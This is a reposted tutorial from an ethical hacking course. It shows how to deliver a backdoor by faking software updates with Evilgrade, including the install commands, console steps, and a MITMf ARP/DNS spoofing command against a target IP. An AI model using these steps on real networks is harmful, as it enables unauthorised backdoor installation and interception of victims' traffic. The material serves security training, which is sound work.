码迷,mamicode.com
首页 > 数据库 > 详细

Ethical Hacking - GAINING ACCESS(12)

时间:2020-01-04 00:57:21      阅读:91      评论:0      收藏:0      [点我收藏+]

标签:cer   bsp   open   play   port   net   msu   cat   strong   

CLIENT SIDE ATTACKS

Backdoor delivery method1 - Spoofing Software Updates

Fake an update for an already installed program.

Install the backdoor instead of the update.

Require DNS spoofing + Evilgrade(a server to serve the update).

1. Download and install Evilgrade.

https://github.com/infobyte/evilgrade

git clone https://github.com/infobyte/evilgrade.git

cd evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML

技术图片

 技术图片

 

 技术图片

 

 技术图片

 技术图片

 

 

 OR

apt-get install isr-evilgrade

技术图片

 

 

 

2. Start Evilgrade. 

evilgrade

 技术图片

 

 

 

3. Check programs that can be hijacked.

show modules

 

List of modules:
===============

acer
allmynotes
amsn
appleupdate
appstore
apptapp
apt
asus
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
fsecure_client
getjar
gom
googleanalytics
growl
inteldriver
isopen
istat
itunes
jdtoolkit
jet
jetphoto
keepass
lenovo
lenovoapk
lenovofirmware
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openbazaar
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
port
quicktime
safari
samsung
skype
soapui
sparkle
sparkle2
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
timedoctor
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 80 modules available.

 

4. Select one

configure [module]

 技术图片

5. Set backdoor location.

set agent [agent location]

 

 技术图片

 

 

6. Start server

start

 技术图片

 

 

7. Start DNS spoofing and handler.

 Modify the mitmf.conf file.

技术图片

 Start MITMF:

pyton2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.21 -i eth0 --dns

技术图片

 

 Msf:

技术图片

 

 

Install the update on target machine. Then you can run the backdoor program>>

技术图片

 

Ethical Hacking - GAINING ACCESS(12)

标签:cer   bsp   open   play   port   net   msu   cat   strong   

原文地址:https://www.cnblogs.com/keepmoving1113/p/12147545.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!